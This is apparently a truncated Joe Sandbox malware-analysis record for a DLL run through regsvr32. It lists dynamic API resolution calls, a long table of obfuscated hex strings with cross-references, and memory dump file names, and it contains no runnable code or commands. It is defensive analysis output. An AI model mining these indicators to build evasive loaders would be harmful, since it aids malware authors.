GetProcAddress.KERNEL32 ref: 00007FF983DB0D24
GetProcAddress.KERNEL32 ref: 00007FF983DB0D95
GetProcAddress.KERNEL32 ref: 00007FF983DB0E06
GetProcAddress.KERNEL32 ref: 00007FF983DB0E77
LoadLibraryA.KERNELBASE ref: 00007FF983DB0EE5
GetProcAddress.KERNEL32 ref: 00007FF983DB0F4D
GetProcAddress.KERNEL32 ref: 00007FF983DB0FBA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB100C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1012
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1018
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB101E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1024
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB102A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1030
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1036
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB103C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1042
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1048
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB104E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1054
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB105A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1060
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1066
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB106C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1072
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1078
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB107E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1084
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB108A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1090
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1096
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB109C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB10FC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1102
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1108
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB110E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1114
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB111A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1120
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1126
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB112C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1132
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1138
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB113E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1144
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB114A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB1150

Strings

022a590d2d2a261c2ff43f11893052504107314f076522501b83d9, xrefs: 00007FF983DAE26E
fca149785f396367b46459231b7c6df2b4615c544e191e2bfaefc385ede5df, xrefs: 00007FF983DB0810
d4f019a4bc1b04ce85451244cdc3825586136d8a443a5fe5050b7c41c972a7, xrefs: 00007FF983DAFBD8
bf81c4339c0567778e1845a6fa806f77f81cacd12c5d5352b9f2ce1b9570724c9d7ad1, xrefs: 00007FF983DAE5F6
74a14e1cbac65f5beb1ddf413f8ad0b126e2cdb549e6d5eb, xrefs: 00007FF983DAE11B
9f0e02e9cb065cd45ab6d29a2e82d74aec8ae47ad0a69369578d33, xrefs: 00007FF983DB0206
19d5b245ac951bc00d224db747a1619849ee3315dc3a52a19ef2da1526d0, xrefs: 00007FF983DACD37
66f36046464d7ebfb22dfee5b266c15b2fb2a685b1928942bfe279f201, xrefs: 00007FF983DB08F2
931fa7d5eeaaa4b85a7d0633dd488592daab78c85490519d8496fea31b30c112, xrefs: 00007FF983DB0AB6
f8cf18dd257b3c5994c79aa0f88dba1abe186ed7b1a6f5df2e, xrefs: 00007FF983DAE9EF
27809bba4d35951c83c4ffc99b43c363649668b38ada1d648a21aa06c9e2535513f7, xrefs: 00007FF983DADFC8
6c4134218acfdbeeaed3ffe0abb7a81b2b0f4f3ec666de71bb0c8104dc18, xrefs: 00007FF983DABDD8
8598e1d592fd856d79aba497a0b293c3ca22a61dc24abbb3b24e, xrefs: 00007FF983DAD257
ae451e306fd5880b0b283c8d85a7edf1f8d4b8fce652b6fc9bdf8c62, xrefs: 00007FF983DAE82B
7acc638be5eb9cd3c8d95f7d29affd383c99947bc94bb90ea9070f, xrefs: 00007FF983DAEBA7
68e3946f496577446d0811362ba750c93abc4f714d4d48754e275a1957b59d03, xrefs: 00007FF983DAFB67
adbb1de09138566ae13bf6a34ef0e33dea345de917447773db8e1ed2ee73f1b87ca8db, xrefs: 00007FF983DB00B3
a8c7f21f54680b3577fe942aa792c17eeb5ec9b7979ac1869e03f2ab7fac, xrefs: 00007FF983DAD618
f9007b3c51c4eb71e936ba5887ccef7baae2da94a0059a8e237cb4896dd5555cdc999ae7, xrefs: 00007FF983DAFA20
a3c3e12838d058220ec7c6432ae298eaee42d598e65f6b2c67d849, xrefs: 00007FF983DAC817
80ebe56c42434189c0ba73a70ecaeaf3c644cfc7c3e9da20946872b9d24f, xrefs: 00007FF983DAD39F
6e9d6abda563597e5562f718bbef9a6729d1cf39f9e3e9e3d7c153, xrefs: 00007FF983DAF011
cbcfa9c911c58c51f737695511215bb3823dfc59389c605881d2d7ee, xrefs: 00007FF983DB034D
d9c026900582effe1ebd7cc94fdb8afbaa0241bdd465b86812c3d3, xrefs: 00007FF983DAF868
f1660a456733745a1791021663c647e5b2a6c9edfea891bedd295312, xrefs: 00007FF983DACE7F
dd169041e6045ea695d4b5fba5755d3b9ae90d0a85edd623df71a1, xrefs: 00007FF983DAE0AA
a1ac343ab94ffd8b46ef83824d313b40f33a691cd5ff6cac8f19df2529, xrefs: 00007FF983DAFD9C
2061ba6256efb6891eecb1a8a2f3ef076c62b7be9d02e41f68f22aee29bd3766272ae5e2e3, xrefs: 00007FF983DAFD2B
bb46ffb0aca3bd917252d1c742e13147f8cc56875f99679986a414a78c0f527089a62df03dee, xrefs: 00007FF983DAF551
2e54efd0785843876af16fa51ee73b5b6646dd7d54795faab90100c3b214, xrefs: 00007FF983DB0A45
cf90336a761150b3802e1f31358cd1918b7e212e2c585d9c701d63316c8511ee55b7fdc0, xrefs: 00007FF983DB072E
6dc1e696bfe71e78ac8508393e9d66f82a8e1cdd0b82f8ef34, xrefs: 00007FF983DAF164
d3f56f5ee2844541bfa7ff17bffdb2a994041f078a7c5c7ab77ff58c57fd26e156ccd4, xrefs: 00007FF983DAEF2F
a73c13507c528524702e97c156d4d65be3bac5f0f8cf05435912e653, xrefs: 00007FF983DAF6A4
c52efbf68579ec032cd130e47aacf55789c852c0091997e6ab0841f2, xrefs: 00007FF983DAC067
326a084d7628bdbc97b8c826c5a440fd7a641825004d9e46835ee7b414c3f75d, xrefs: 00007FF983DB04F9
7a3506fdc2c3f933d1a65269d19684b4397e1d8137912563c6052f07, xrefs: 00007FF983DADA11
60f9bec216d00726e2eb331997ac34de24b86acdaf1a593c, xrefs: 00007FF983DAF633
8add899fac99b955f890785f2daa75b1c7758a709a6abf8f32dae3, xrefs: 00007FF983DAD7DC
c009125dec75eea8bce4346a30ddf95695ce90890a08884c9f1a4a742bb0201abfe1, xrefs: 00007FF983DB0F14
6f46400e097576c089e1826b85a329f52906284205151baf60e80608da, xrefs: 00007FF983DAD454
bf9e295aed52287f64d377289bdaf2d5f70c446ec2fcb8a8af, xrefs: 00007FF983DAE4A3
eceff0f615e1c4fb66078a687301ac07ab21a50777fb4ff2fd96795f4d21e8ae, xrefs: 00007FF983DAD689
8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6, xrefs: 00007FF983DAEB42
1e33beaa587030c02c47d930b6d9b9585d1cc70c203551f9a7853d69, xrefs: 00007FF983DADF57
d736c92c5a303cbef4a63cad9585506b98de72303a782bf667b2fd, xrefs: 00007FF983DADE04
23107da82c414ec26013f2d64c7334056a141dd08ea18a3c1f63ff476e7e3e6c, xrefs: 00007FF983DB064C
35afa16f90a328c897dd203b3c7bf6cf63a5766d884a0e9673c195cb949b, xrefs: 00007FF983DAE90D
2b1c7dcc3a269ac1ceeb3f2e01377d19621019b0f8b04ffa66e8b6fcbbe5f488, xrefs: 00007FF983DB0D5C
75795f2a2fec19bf9e7f917114a194ce3323125c3db4d51ec6d02d396c, xrefs: 00007FF983DADC40
ed45e0772b1e6a7ce3d97cf2cbb14418bf9f183e601b0306b30b1b9c32c6faa3, xrefs: 00007FF983DAFE0D
c92e521f87ac24ff436835e1e8612bf29bd0e5a94b93e17f504d1db92909, xrefs: 00007FF983DAFEEF
65da0a4293a43bc418b649a6ce0d7936268ee1c225e49c374284ac7ed9b6a3f0d148, xrefs: 00007FF983DAF5C2
e87ee75d200430eb580caaeb80adad2aafb4272c691f5cdee98b, xrefs: 00007FF983DAEAD1
90e4e54d02c03b7b04b0cc3cc4a1a7a3c243c1cfa10e465817c277, xrefs: 00007FF983DB0042
ba56732586fb83df10df36c2c1c23d3de8dbcfa95dc3218aff6b388307bdc1, xrefs: 00007FF983DAFE7E
f5788632833a499e00af6570eb281151b3a24a1cc89bbc4629f1d5, xrefs: 00007FF983DAECFA
9406d30f477d17be06d9b063a198a652d8b10368637702cea902cbe9, xrefs: 00007FF983DABF1F
66384b63830f06dd89d9d6dc2813ba253469456284e7842dc14ef94914628f, xrefs: 00007FF983DAFCBA
ada61c8cc4d4ca79462a045e53833d69ea29419a378d2335047a1b3d1ace, xrefs: 00007FF983DAEC18
ff37083708963434836f8f0c252e8680adff9bc9a0451464a4, xrefs: 00007FF983DAF246
93735d3d3632064f4051343953130094c1d7ed9fd98ee6e2c7ef9edfdb, xrefs: 00007FF983DAFAF6
5fc1cfa2f72c018b070f8174a41c8c851caf05c6450c5dbfc8a2, xrefs: 00007FF983DAE7BA
0a6b4b18fb316b6ccd54060af723a5004d437c37b8e8f1e951753a5ecf8371, xrefs: 00007FF983DAD10F
10ea9417b1e5eca3ebcd47ea70f91f6758c62641bf2aa36ed77f49d6c3492204, xrefs: 00007FF983DB09D4
6adae71efed0775d74b4cafe393cd05f2981037cf643644b508728a5ef84, xrefs: 00007FF983DAC2F7
c21bde90e48282e9161e20daa9367e2e84f646b210fb0b91f3abe25498ef, xrefs: 00007FF983DADBCF
ac94aea45c890165b38ff49514ce1d70fa07db0b22caa7835cbf24d28335, xrefs: 00007FF983DADE75
ca35339a90c6667b02b95fba2d26f3158ddd9a54a10a1c375499ae43, xrefs: 00007FF983DAC587
10cac4a3326a442915df4e8306c93e4d57f848bbfbfed995f35f59bfd861, xrefs: 00007FF983DAE3C1
8c76136e982d69548c2b8bbb9127a810c5ddbab15b181434f7ac429751, xrefs: 00007FF983DB0488
06d3733131e648cf28720bc7a05aabf141f7f092da4f73d99ca3cd7eac9f57d5, xrefs: 00007FF983DAF0F3
e0d92630ea5ab7e9169067535c436f1ba418520799a644dfa57670407452780d99326d1c, xrefs: 00007FF983DB0B98
85dc60a65d009ab880ff90517ca5706ac67565baa1c83ee334, xrefs: 00007FF983DAC6CF
ed4393d9cfcf648c68a8462e5d12462fa59275dc42f8f90716f7df97a5e0, xrefs: 00007FF983DB05DB
4b0b66734236dacb0dbd0f1fa927e9f4087172605605993b5a82cc, xrefs: 00007FF983DAD84D
dd862964aa8aca24afcf7450037a2cd58e6d2829e01e9bdd18b2a581, xrefs: 00007FF983DAF7F7
27bdeb72ca4adbdce35c2d8d09c434dd60b82718bd933d8d0b1155b4d85207b7f51f, xrefs: 00007FF983DAC1AF
d315fa9fc315aa9dda68ee749f45228c94e46ab41367bd54ebf16c51a083ce, xrefs: 00007FF983DB03B2
277b548ff70fc3f99d349e0f18f3763a607e5e820c70c75babcb3c5e23, xrefs: 00007FF983DAE749
cc728c2004b83a708c5273fd44bf7b8e9c9c7f3c5d96df9c223e28ad9d, xrefs: 00007FF983DAD9A0
360cfd519b97e544812269d269f5645c7118918d798a1a32d6b2b20c00bbbe8fdc91, xrefs: 00007FF983DAD5A7
68e3e048d7ba3ccdeaee5651d4ec733224a82704a66c00bf3ca49ba6179c8aeee768fdd046, xrefs: 00007FF983DAFFD1
26cbf04a4868128ae27692fa3f400af569d24763667b1df2685f, xrefs: 00007FF983DADB64
8a154c878361e80767350518452912dfcebe9e7c8b8f214f441450, xrefs: 00007FF983DAD8BE
c442d929b46725d62b32b0a6280ef60f83a40964b5a1ef4d094bac63254fd6ae, xrefs: 00007FF983DAEEBE
91c4401fe131385d4e2abe925cce858dc263570e86db868baae939dfe65a, xrefs: 00007FF983DAE1FD
f92111aee3dd3eb249b4b6c99da63ac0befa9f7eff4813c2ff0a, xrefs: 00007FF983DAF46F
0a8f72b7210cc93bd6890e2f17b76aae42a8bb7c1b65c997, xrefs: 00007FF983DAE432
ae70ab793522704fa7436c63fc906f4bedf229295a110d27c1, xrefs: 00007FF983DAD76B
475464bad40fb48e809a5fb0f7e726c0042223f85832d233dc2a1dc853c4d123370d08c26502d923, xrefs: 00007FF983DAE2DF
af6d4d98b684a445cca353a6da190bf7fcd9d73dee0bdbfb73b9985be28feb6eb890a56a, xrefs: 00007FF983DAF93E
dfdc4db9ab76b794a162ede3efe2737d973f06cf3724fd0dfef965f379e8efd770fb, xrefs: 00007FF983DB06BD
c14f175733a8f3afce34d618e4699e4488a9caf8b97fe932affe5c0b9f82755ef1fb9494, xrefs: 00007FF983DB0881
8de56a5c0dcbbf74487691107cc39fdcda4d4e660e955843687b99facb6d9f2cd34f, xrefs: 00007FF983DADEE6
7bdf7829949fa5099c95d5760809de3d339894cd0af03b569868cccfa2d8720e, xrefs: 00007FF983DB0963
6d079b4125d59aa358b2f5904df97d742f41aeade445, xrefs: 00007FF983DAF4E0
a5efba161c4e2ee9d74c4b7de835b92df568bdc8b18cd10beee4c6c95213fd, xrefs: 00007FF983DACBEF
d8cc16f26f32c667e8d27907236797fb8d1349ffffba12199e2d30632f0ef067da57, xrefs: 00007FF983DB0F81
bfbd7ac29b17425c42fe685407a963e1f936298e592707290a8697, xrefs: 00007FF983DADD93
d9cd3e33aaa2d19c56f72ee1550d26c89e367c18db17a25170d39506365a18802b89d4825b8a12ea, xrefs: 00007FF983DAF1D5
1a6a127f9e04974b54a6ee30e44a747f5d52340fd89e605f78, xrefs: 00007FF983DAF786
d7dddef40bcb161fd3eb8d8a7486578f833b970e6cc9bed563d827c2d53612ee, xrefs: 00007FF983DAEA60
bab48db1066544d59deb3233c5a06e22f329d004707b5afb31a8f3b414f2f5bb64, xrefs: 00007FF983DB0E3E
a57c927096ad23810290f94b0650cd41f7ee1b2fdc1d5baec90f97b0c3f67a, xrefs: 00007FF983DAFF60
51d1ab1f973b22ad171de9114b27ad0a16a27d36c890d9374f27a0c5, xrefs: 00007FF983DAE350
bf1903b8d5fd63ef8b417979e962dab0f884f304b32422ae5147, xrefs: 00007FF983DAF3FE
784fadad03d79961f5d491a70ae6ea522b0cce1440fe090c9635, xrefs: 00007FF983DAF2B7
f23225cf1370a957296663bfb53054b1a2f1a007524b8ebcd0cec408c98a89, xrefs: 00007FF983DB026B
5c8e6cba98791bb246a40313f165e04a14eef63cebe29c405495e7811503978a, xrefs: 00007FF983DB056A
8b84e55763d57f3015dec1a0e67258accc2dbcbdb108025f2fb817d158586da05fb2380123, xrefs: 00007FF983DADCB1
99f2f392ab7904b41d9251c4cdd1201bd443c322e8f6976113f9ff, xrefs: 00007FF983DAEC89
8248be407b4f2370d3c434278f7d41efd1e02d190725524bf554347cb5a18c06d0f12207, xrefs: 00007FF983DAE6D8
6cc7a01ef6b434925547b47afaf526923b955b2cb4652599a8835b, xrefs: 00007FF983DB0423
16a2d2d8afb6955ad5291461e8545f52598b3c8a75b14b72c298ffca4d724874, xrefs: 00007FF983DB0124
a93fa231bff82bba3cac1a089047ec2aecab6025ca4004dd845b32, xrefs: 00007FF983DAE97E
b869dee166604c7dd136156f7162c305ebca53d7c5e3c0d16437506f7f69c290, xrefs: 00007FF983DAF8CD
6f97f1348aedd0519f2bd6b0a4d4642f28da5f3cdf5ce8d63e41f23aea7f, xrefs: 00007FF983DAED6B
f992f1205b6fcce93ceb623c698f7b12be49ccbb898820a6ed7553061df7ef891fff7700, xrefs: 00007FF983DAD536
23652a638c61b35ff5c0d664f45b77e574632037def9231080, xrefs: 00007FF983DAE18C
980b94e883b7771cc422064567daadc2d9b648d525e6c5b6195e362336855ef5016f9c11e1, xrefs: 00007FF983DB0195
2bd67717abdd51e5bb5239279142d2677ccbd5b65be9ca7cae92cc87737ecec38d383b, xrefs: 00007FF983DAE039
194ad6e2463647b9be0b2e4d7c26a6f14f6cc85e6d3a11ee224c07, xrefs: 00007FF983DAE89C
1c13803fdaf8353c9c9359d5ae32cc454e38dfb30c80e3be4ea89404d2b7, xrefs: 00007FF983DAFC49
5a814cfbaeb81e87bc8a6772ad2aced212e7df54bb671dc811eaf8ef316fe95e6580a920fd12, xrefs: 00007FF983DB079F
bf51a99cdb967bf6a1d913652f34a12defcc0af54baea663f06f15025e1e, xrefs: 00007FF983DAD92F
ca56dc2ee2b0c3d7a05c5ae07ef9c1de8dbe1673f43d9c24e5cbf5464cd461da, xrefs: 00007FF983DAEFA0
3afade5ea96645d0cb395edcfd991f3a7de35439a2eacb77d0, xrefs: 00007FF983DAF399
0c3875e657e18cea4a4743b7f5c047da45131291b43bd24c557740b83d89a712700d00a7, xrefs: 00007FF983DB0CEB
d29f33018596af56885209a0391cf43d81722440b5, xrefs: 00007FF983DAE667
b120fd8c4181662b994a1f36bc714a73f9ad24d8ca2e2669a28de3a0797b4573badb, xrefs: 00007FF983DB0B27
b04a73b91d80aa63421bef90fb578aa4f4dbc418719478725c229a, xrefs: 00007FF983DACAA7
fc56483f3e7d781d805ab9ebfb49a29cbb88b4cfb2, xrefs: 00007FF983DAEE4D
ec3c4702515cd356c277cc1a46f21024abf2c18eb0882e14b38c215577e99cef, xrefs: 00007FF983DACFC7
44e07755013ffac525bbf9f2ccc1531303868583f6a82091c10aba268c2230, xrefs: 00007FF983DADAF3
3bce7b3e49fbd6ee4e71c7864d7c09d073c9c688801fad113a3a886b555d1ca9f359470b318b, xrefs: 00007FF983DB0C09
54aedfe200a2e70b95878acadc33f7d313d873c7a866f49262ac48e457168c3e1ed969e5b2, xrefs: 00007FF983DAD4C5
e4f024b0f588a0906eb3fc55ae76938ab70f6cb938f639c5cf1997925d5fa46f, xrefs: 00007FF983DAF9AF
b5d89de6a671b8e58f278d4b431bbeeef24fa617d8c71b91693df4d6e79944de04ae4aed, xrefs: 00007FF983DADD22
9471e86b7bbcf2b6e7d521338e6098b6d3c75b746aa03bee6cfabaf904, xrefs: 00007FF983DAF715
b1e575e0f56b59ae6fb4053a0134145ef07172f376741e82c3137a2c, xrefs: 00007FF983DAFA91
d45827653ff249726a79fdbede60cf2697bdfffbb0272833352983, xrefs: 00007FF983DAC95F
594c15ed3d0f9ff0999324d0235430351e3756f7a5c937ab669cd560, xrefs: 00007FF983DAE585
c3afe3583507f43898d5f76303035c188b50c7ef9ff6660cf155d7d1a1d6cb, xrefs: 00007FF983DB0C7A
a246aef866f9432cd611cf00f25a54bae5c61ca7b43f0e47ff9a0577ead3e22bfa, xrefs: 00007FF983DAE514
13da3ce74a6ecdeee44fc2e702edfa3b5aeea6241c1cb42e89aa0793f451ca9fe85e07, xrefs: 00007FF983DB0DCD
91a82fffab8959a91a27732300a81773d61b40ef25dee2254b, xrefs: 00007FF983DAF082
6aa0bf16a73a4e6ea6ca1360de0eb9923ef10f6aaefdda, xrefs: 00007FF983DAF328
e1d532db7c6dd3445eb4439561fda38fa61650c6d5dc7a526995b74c49d81ed0, xrefs: 00007FF983DADA82
58074166796bb64cc10d838fbf20c48e086e5b556a68b29b1f6a807cb7e461, xrefs: 00007FF983DB02DC
94d6f7f4c934be13639cab6eb2e02876d360e343efb6782d27d71939ea672a0b, xrefs: 00007FF983DAC43F
95a43bfef3821f41def3d4c0b088041ed2135cf6608fe0f14ec975f4, xrefs: 00007FF983DAD6FA
6419b63e2652735e7612d56c96193ce2295590dd9aafb9a5bcd642, xrefs: 00007FF983DAEDDC
9bc85aef3b6da834978cb9f6dbb0007aee5462e0b4b731619a7a, xrefs: 00007FF983DB0EAF

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$_invalid_parameter_noinfo_noreturn$LibraryLoad$ByteCharMultiWide$ExitProcess
String ID: 022a590d2d2a261c2ff43f11893052504107314f076522501b83d9$06d3733131e648cf28720bc7a05aabf141f7f092da4f73d99ca3cd7eac9f57d5$0a6b4b18fb316b6ccd54060af723a5004d437c37b8e8f1e951753a5ecf8371$0a8f72b7210cc93bd6890e2f17b76aae42a8bb7c1b65c997$0c3875e657e18cea4a4743b7f5c047da45131291b43bd24c557740b83d89a712700d00a7$10cac4a3326a442915df4e8306c93e4d57f848bbfbfed995f35f59bfd861$10ea9417b1e5eca3ebcd47ea70f91f6758c62641bf2aa36ed77f49d6c3492204$13da3ce74a6ecdeee44fc2e702edfa3b5aeea6241c1cb42e89aa0793f451ca9fe85e07$16a2d2d8afb6955ad5291461e8545f52598b3c8a75b14b72c298ffca4d724874$194ad6e2463647b9be0b2e4d7c26a6f14f6cc85e6d3a11ee224c07$19d5b245ac951bc00d224db747a1619849ee3315dc3a52a19ef2da1526d0$1a6a127f9e04974b54a6ee30e44a747f5d52340fd89e605f78$1c13803fdaf8353c9c9359d5ae32cc454e38dfb30c80e3be4ea89404d2b7$1e33beaa587030c02c47d930b6d9b9585d1cc70c203551f9a7853d69$2061ba6256efb6891eecb1a8a2f3ef076c62b7be9d02e41f68f22aee29bd3766272ae5e2e3$23107da82c414ec26013f2d64c7334056a141dd08ea18a3c1f63ff476e7e3e6c$23652a638c61b35ff5c0d664f45b77e574632037def9231080$26cbf04a4868128ae27692fa3f400af569d24763667b1df2685f$277b548ff70fc3f99d349e0f18f3763a607e5e820c70c75babcb3c5e23$27809bba4d35951c83c4ffc99b43c363649668b38ada1d648a21aa06c9e2535513f7$27bdeb72ca4adbdce35c2d8d09c434dd60b82718bd933d8d0b1155b4d85207b7f51f$2b1c7dcc3a269ac1ceeb3f2e01377d19621019b0f8b04ffa66e8b6fcbbe5f488$2bd67717abdd51e5bb5239279142d2677ccbd5b65be9ca7cae92cc87737ecec38d383b$2e54efd0785843876af16fa51ee73b5b6646dd7d54795faab90100c3b214$326a084d7628bdbc97b8c826c5a440fd7a641825004d9e46835ee7b414c3f75d$35afa16f90a328c897dd203b3c7bf6cf63a5766d884a0e9673c195cb949b$360cfd519b97e544812269d269f5645c7118918d798a1a32d6b2b20c00bbbe8fdc91$3afade5ea96645d0cb395edcfd991f3a7de35439a2eacb77d0$3bce7b3e49fbd6ee4e71c7864d7c09d073c9c688801fad113a3a886b555d1ca9f359470b318b$44e07755013ffac525bbf9f2ccc1531303868583f6a82091c10aba268c2230$475464bad40fb48e809a5fb0f7e726c0042223f85832d233dc2a1dc853c4d123370d08c26502d923$4b0b66734236dacb0dbd0f1fa927e9f4087172605605993b5a82cc$51d1ab1f973b22ad171de9114b27ad0a16a27d36c890d9374f27a0c5$54aedfe200a2e70b95878acadc33f7d313d873c7a866f49262ac48e457168c3e1ed969e5b2$58074166796bb64cc10d838fbf20c48e086e5b556a68b29b1f6a807cb7e461$594c15ed3d0f9ff0999324d0235430351e3756f7a5c937ab669cd560$5a814cfbaeb81e87bc8a6772ad2aced212e7df54bb671dc811eaf8ef316fe95e6580a920fd12$5c8e6cba98791bb246a40313f165e04a14eef63cebe29c405495e7811503978a$5fc1cfa2f72c018b070f8174a41c8c851caf05c6450c5dbfc8a2$60f9bec216d00726e2eb331997ac34de24b86acdaf1a593c$6419b63e2652735e7612d56c96193ce2295590dd9aafb9a5bcd642$65da0a4293a43bc418b649a6ce0d7936268ee1c225e49c374284ac7ed9b6a3f0d148$66384b63830f06dd89d9d6dc2813ba253469456284e7842dc14ef94914628f$66f36046464d7ebfb22dfee5b266c15b2fb2a685b1928942bfe279f201$68e3946f496577446d0811362ba750c93abc4f714d4d48754e275a1957b59d03$68e3e048d7ba3ccdeaee5651d4ec733224a82704a66c00bf3ca49ba6179c8aeee768fdd046$6aa0bf16a73a4e6ea6ca1360de0eb9923ef10f6aaefdda$6adae71efed0775d74b4cafe393cd05f2981037cf643644b508728a5ef84$6c4134218acfdbeeaed3ffe0abb7a81b2b0f4f3ec666de71bb0c8104dc18$6cc7a01ef6b434925547b47afaf526923b955b2cb4652599a8835b$6d079b4125d59aa358b2f5904df97d742f41aeade445$6dc1e696bfe71e78ac8508393e9d66f82a8e1cdd0b82f8ef34$6e9d6abda563597e5562f718bbef9a6729d1cf39f9e3e9e3d7c153$6f46400e097576c089e1826b85a329f52906284205151baf60e80608da$6f97f1348aedd0519f2bd6b0a4d4642f28da5f3cdf5ce8d63e41f23aea7f$74a14e1cbac65f5beb1ddf413f8ad0b126e2cdb549e6d5eb$75795f2a2fec19bf9e7f917114a194ce3323125c3db4d51ec6d02d396c$784fadad03d79961f5d491a70ae6ea522b0cce1440fe090c9635$7a3506fdc2c3f933d1a65269d19684b4397e1d8137912563c6052f07$7acc638be5eb9cd3c8d95f7d29affd383c99947bc94bb90ea9070f$7bdf7829949fa5099c95d5760809de3d339894cd0af03b569868cccfa2d8720e$80ebe56c42434189c0ba73a70ecaeaf3c644cfc7c3e9da20946872b9d24f$8248be407b4f2370d3c434278f7d41efd1e02d190725524bf554347cb5a18c06d0f12207$8598e1d592fd856d79aba497a0b293c3ca22a61dc24abbb3b24e$85dc60a65d009ab880ff90517ca5706ac67565baa1c83ee334$8a154c878361e80767350518452912dfcebe9e7c8b8f214f441450$8add899fac99b955f890785f2daa75b1c7758a709a6abf8f32dae3$8b84e55763d57f3015dec1a0e67258accc2dbcbdb108025f2fb817d158586da05fb2380123$8c76136e982d69548c2b8bbb9127a810c5ddbab15b181434f7ac429751$8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6$8de56a5c0dcbbf74487691107cc39fdcda4d4e660e955843687b99facb6d9f2cd34f$90e4e54d02c03b7b04b0cc3cc4a1a7a3c243c1cfa10e465817c277$91a82fffab8959a91a27732300a81773d61b40ef25dee2254b$91c4401fe131385d4e2abe925cce858dc263570e86db868baae939dfe65a$931fa7d5eeaaa4b85a7d0633dd488592daab78c85490519d8496fea31b30c112$93735d3d3632064f4051343953130094c1d7ed9fd98ee6e2c7ef9edfdb$9406d30f477d17be06d9b063a198a652d8b10368637702cea902cbe9$9471e86b7bbcf2b6e7d521338e6098b6d3c75b746aa03bee6cfabaf904$94d6f7f4c934be13639cab6eb2e02876d360e343efb6782d27d71939ea672a0b$95a43bfef3821f41def3d4c0b088041ed2135cf6608fe0f14ec975f4$980b94e883b7771cc422064567daadc2d9b648d525e6c5b6195e362336855ef5016f9c11e1$99f2f392ab7904b41d9251c4cdd1201bd443c322e8f6976113f9ff$9bc85aef3b6da834978cb9f6dbb0007aee5462e0b4b731619a7a$9f0e02e9cb065cd45ab6d29a2e82d74aec8ae47ad0a69369578d33$a1ac343ab94ffd8b46ef83824d313b40f33a691cd5ff6cac8f19df2529$a246aef866f9432cd61